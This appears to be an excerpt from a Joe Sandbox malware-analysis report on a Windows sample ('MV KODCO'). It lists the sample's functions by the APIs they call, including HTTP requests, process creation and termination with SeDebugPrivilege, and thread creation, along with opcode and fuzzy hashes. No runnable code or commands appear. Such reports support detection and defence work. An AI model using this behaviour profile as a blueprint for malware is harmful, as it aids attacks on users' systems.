                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005E30DC
                                                          • CoUninitialize.OLE32(?,00000000), ref: 005E3181
                                                          • UnregisterHotKey.USER32(?), ref: 005E32A9
                                                          • DestroyWindow.USER32(?), ref: 00655079
                                                          • FreeLibrary.KERNEL32(?), ref: 006550F8
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00655125
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 594e38ed245800677fc20ed14140cc22337c47eb8e6560fac39832ac0e97d754
                                                          • Instruction ID: fa2f9385260b7b5e56e04f9d949a28902d8a7b3e97402ffdb6129f92167a605f
                                                          • Opcode Fuzzy Hash: 594e38ed245800677fc20ed14140cc22337c47eb8e6560fac39832ac0e97d754
                                                          • Instruction Fuzzy Hash: 7E914C74700282CFC719EF15C89DA68FBA5FF44305F5441A9E58AA72A2DF30AE1ACF50
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 005FCC15
                                                            • Part of subcall function 005FCCCD: GetClientRect.USER32(?,?), ref: 005FCCF6
                                                            • Part of subcall function 005FCCCD: GetWindowRect.USER32(?,?), ref: 005FCD37
                                                            • Part of subcall function 005FCCCD: ScreenToClient.USER32(?,?), ref: 005FCD5F
                                                          • GetDC.USER32 ref: 0065D137
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0065D14A
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0065D158
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0065D16D
                                                          • ReleaseDC.USER32(?,00000000), ref: 0065D175
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0065D200
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: a97ae76097cf596795b5a8e667d153d092edcf4ed599219de4f9cde78d76a73d
                                                          • Instruction ID: f6a4cf24436223260c93865991f090aa23c281bcfe7c377a4384e642e9c075b9
                                                          • Opcode Fuzzy Hash: a97ae76097cf596795b5a8e667d153d092edcf4ed599219de4f9cde78d76a73d
                                                          • Instruction Fuzzy Hash: F871B930500209DFCF319F64C984AEA7FB6FF49362F144269EE559A2A6C7358849DF60
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006345FF
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0063462B
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0063466D
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00634682
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0063468F
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006346BF
                                                          • InternetCloseHandle.WININET(00000000), ref: 00634706
                                                            • Part of subcall function 00635052: GetLastError.KERNEL32(?,?,006343CC,00000000,00000000,00000001), ref: 00635067
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 1241431887-3916222277
                                                          • Opcode ID: 5556ca9c9ee464bead63ba7c8804a38b48f2fe6a8cb72e8a9ff65134c936a2e0
                                                          • Instruction ID: a7a0afdca125e9f8aea180926b73ba0931569afcc5cfcd21b1db864acbdfccee
                                                          • Opcode Fuzzy Hash: 5556ca9c9ee464bead63ba7c8804a38b48f2fe6a8cb72e8a9ff65134c936a2e0
                                                          • Instruction Fuzzy Hash: 194171B1901605BFEB059F50CC85FFB7BAEEF0A354F00401AF9059A141DBB1A9458BE5
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0067DC00), ref: 0063B715
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0067DC00), ref: 0063B749
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0063B8C1
                                                          • SysFreeString.OLEAUT32(?), ref: 0063B8EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: e3d53f0d5ca8b6e4cdd9160ba480b43e7f1677b1392873cf4f697d85fa1ad59d
                                                          • Instruction ID: f177c1c76166c31db85cff9637b54d810475f10a51d432f03fbbd660df6f8f78
                                                          • Opcode Fuzzy Hash: e3d53f0d5ca8b6e4cdd9160ba480b43e7f1677b1392873cf4f697d85fa1ad59d
                                                          • Instruction Fuzzy Hash: 08F11C75A00109EFCF04DF94C888EAEB7BAFF89315F109459FA05AB250DB71AD46CB90
                                                          APIs
                                                          • _memset.LIBCMT ref: 006424F5
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00642688
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006426AC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006426EC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0064270E
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0064286F
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006428A1
                                                          • CloseHandle.KERNEL32(?), ref: 006428D0
                                                          • CloseHandle.KERNEL32(?), ref: 00642947
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: a685a1d127c825a77ba8daf870e361f9ffc100c213057cbff7bfe8a3d100ec9f
                                                          • Instruction ID: 4a9fd38ff037795f5983daabcd763601efa454f219cd3a5d554e968db904eb12
                                                          • Opcode Fuzzy Hash: a685a1d127c825a77ba8daf870e361f9ffc100c213057cbff7bfe8a3d100ec9f
                                                          • Instruction Fuzzy Hash: 6DD1C135604242DFC718EF25C865A6EBBE6BF84310F24885DF9899B3A2DB31DC45CB52
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0064B3F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: f91958346c614f3696cf0f5396c228b12e98f5c2de72a8b6008686626e9242d2
                                                          • Instruction ID: 659bfcd3ad8767a49a585ee5ae3dee83e0dc3839298c09f9d2125191a909ecc4
                                                          • Opcode Fuzzy Hash: f91958346c614f3696cf0f5396c228b12e98f5c2de72a8b6008686626e9242d2
                                                          • Instruction Fuzzy Hash: DD51B130A00208FFEF259F29CC89BED7BABBB05764F246015F615D62E2C771E9409B55
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0065DB1B
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0065DB3C
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0065DB51
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0065DB6E
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0065DB95
                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,005FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0065DBA0
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0065DBBD
                                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,005FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0065DBC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                          • String ID:
                                                          • API String ID: 1268354404-0
                                                          • Opcode ID: 99e94aeaf2b57d98cde95bca9619738cbbbea5b9e30b0b73397b969f606e8945
                                                          • Instruction ID: 5a53a9828bd24c89583587235948e28be2f8ecf40e538d9f76b0aa7594616ada
                                                          • Opcode Fuzzy Hash: 99e94aeaf2b57d98cde95bca9619738cbbbea5b9e30b0b73397b969f606e8945
                                                          • Instruction Fuzzy Hash: 59514AB0A00209EFDB20DF64CC85FAA7BB6FB59750F104518FA4AD62D0D7B4AD80DB51
                                                          APIs
                                                            • Part of subcall function 00626EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00625FA6,?), ref: 00626ED8
                                                            • Part of subcall function 00626EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00625FA6,?), ref: 00626EF1
                                                            • Part of subcall function 006272CB: GetFileAttributesW.KERNEL32(?,00626019), ref: 006272CC
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 006275CA
                                                          • _wcscmp.LIBCMT ref: 006275E2
                                                          • MoveFileW.KERNEL32(?,?), ref: 006275FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: fd0ec4ae92a1423eb722c3a36eeb24a5058a5419b10e19c0eb53e1eb7bfa1043
                                                          • Instruction ID: b8b0dafaae9615b3a2d0ca5fc0ba4a3b20ac865eb14fd7308c7d48b009edb65e
                                                          • Opcode Fuzzy Hash: fd0ec4ae92a1423eb722c3a36eeb24a5058a5419b10e19c0eb53e1eb7bfa1043
                                                          • Instruction Fuzzy Hash: 955140B2A496299ADF94EB94E841DDE73BDAF08310F0040AEF605E3181EA70D7C5CF64
                                                          APIs
                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0065DAD1,00000004,00000000,00000000), ref: 005FEAEB
                                                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0065DAD1,00000004,00000000,00000000), ref: 005FEB32
                                                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0065DAD1,00000004,00000000,00000000), ref: 0065DC86
                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0065DAD1,00000004,00000000,00000000), ref: 0065DCF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 23b398851959ec6ff4a0ad155d196ab7c8cbf23ae14b39bd650782ffd8877f0b
                                                          • Instruction ID: 5fd31381da40ab7e7fb1d143135f0b416c7bf12a166c950f03de159161945665
                                                          • Opcode Fuzzy Hash: 23b398851959ec6ff4a0ad155d196ab7c8cbf23ae14b39bd650782ffd8877f0b
                                                          • Instruction Fuzzy Hash: 3B413970708288DAD7365B28CD8FB7A7E9BBB42301F19180DE387876B1C6B9B844D711
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0061AEF1,00000B00,?,?), ref: 0061B26C
                                                          • HeapAlloc.KERNEL32(00000000,?,0061AEF1,00000B00,?,?), ref: 0061B273
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0061AEF1,00000B00,?,?), ref: 0061B288
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0061AEF1,00000B00,?,?), ref: 0061B290
                                                          • DuplicateHandle.KERNEL32(00000000,?,0061AEF1,00000B00,?,?), ref: 0061B293
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0061AEF1,00000B00,?,?), ref: 0061B2A3
                                                          • GetCurrentProcess.KERNEL32(0061AEF1,00000000,?,0061AEF1,00000B00,?,?), ref: 0061B2AB
                                                          • DuplicateHandle.KERNEL32(00000000,?,0061AEF1,00000B00,?,?), ref: 0061B2AE
                                                          • CreateThread.KERNEL32(00000000,00000000,0061B2D4,00000000,00000000,00000000), ref: 0061B2C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: d68c3ae80467e5568328d9c9582b082a688195119ed82afb4caac410aaab59a0
                                                          • Instruction ID: 51795a5e60e0fe35f41d1fef909b710dcfc5c671a156ca075f40b0c5e8152d32
                                                          • Opcode Fuzzy Hash: d68c3ae80467e5568328d9c9582b082a688195119ed82afb4caac410aaab59a0
                                                          • Instruction Fuzzy Hash: E501B6B5740348BFE710AFA5DC49F6B7BADEB8A711F019411FA05DB2A1CAB59C00CB61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 742b4d10f7308ba0aa97cfd0b23fa8c1d1c9bfbae29ba6fd9502b687228772fb
                                                          • Instruction ID: 08c0eb6ab75e82e39e195ef0e0f30d7188a45624fb63cc56ac1f90eede58fc34
                                                          • Opcode Fuzzy Hash: 742b4d10f7308ba0aa97cfd0b23fa8c1d1c9bfbae29ba6fd9502b687228772fb
                                                          • Instruction Fuzzy Hash: FAE18171A00219ABDF14DFA8D895AEE77BAEF48364F148069F905BB381D770AD41CB90
                                                          APIs
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                            • Part of subcall function 005FC6F4: _wcscpy.LIBCMT ref: 005FC717
                                                          • _wcstok.LIBCMT ref: 0063184E
                                                          • _wcscpy.LIBCMT ref: 006318DD
                                                          • _memset.LIBCMT ref: 00631910
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X$p2il2i
                                                          • API String ID: 774024439-3593325554
                                                          • Opcode ID: f8bf1ef4e742adfbac2a2c8e23ae06aead3e81a9b729cc81ba26031fe7bf9373
                                                          • Instruction ID: 60d66875b22329755dc3724bbd46cf730be89a6ee5395de0627540059af58511
                                                          • Opcode Fuzzy Hash: f8bf1ef4e742adfbac2a2c8e23ae06aead3e81a9b729cc81ba26031fe7bf9373
                                                          • Instruction Fuzzy Hash: 4BC17F355043819FC728EF24C995A9ABBE5FF85350F00496DF9C99B2A2DB30ED05CB92
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00649B19
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00649B2D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00649B47
                                                          • _wcscat.LIBCMT ref: 00649BA2
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00649BB9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00649BE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 4c391659f2496d81a910814607fddeba5a93a579beebe38075de3f6ce4799b5a
                                                          • Instruction ID: 58a4674a2f2fb25074e0b6005b48f5c90a0deb2d03d2472bfb2580e72dacb427
                                                          • Opcode Fuzzy Hash: 4c391659f2496d81a910814607fddeba5a93a579beebe38075de3f6ce4799b5a
                                                          • Instruction Fuzzy Hash: 8F418071A80308ABEB219FA4CC85FEF77BAEF08350F10442AF545E7291D6B19D85CB64
                                                          APIs
                                                            • Part of subcall function 00626532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00626554
                                                            • Part of subcall function 00626532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00626564
                                                            • Part of subcall function 00626532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006265F9
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064179A
                                                          • GetLastError.KERNEL32 ref: 006417AD
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006417D9
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00641855
                                                          • GetLastError.KERNEL32(00000000), ref: 00641860
                                                          • CloseHandle.KERNEL32(00000000), ref: 00641895
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: ef9cf762dfc12bb16d2ff33e59e3d63ae21e0eabbe275178c90a4760100988ab
                                                          • Instruction ID: b41be252d079d8d884599200b6038ae9125d5e9917f439922104344bb982d770
                                                          • Opcode Fuzzy Hash: ef9cf762dfc12bb16d2ff33e59e3d63ae21e0eabbe275178c90a4760100988ab
                                                          • Instruction Fuzzy Hash: DC41BF71700201AFDB15EF54C9A9FADBBA6AF49310F058058FA069F3C2DBB89940CF55
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 006258B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: bd64fb37d1b18b1384c9370d2a7009de42e59edef977923cf5727a501ca10cfc
                                                          • Instruction ID: 1d0e62629b0e4e46a48d906b2de4e0e487f0ecb5562ad0e3b9000bf7d0deed27
                                                          • Opcode Fuzzy Hash: bd64fb37d1b18b1384c9370d2a7009de42e59edef977923cf5727a501ca10cfc
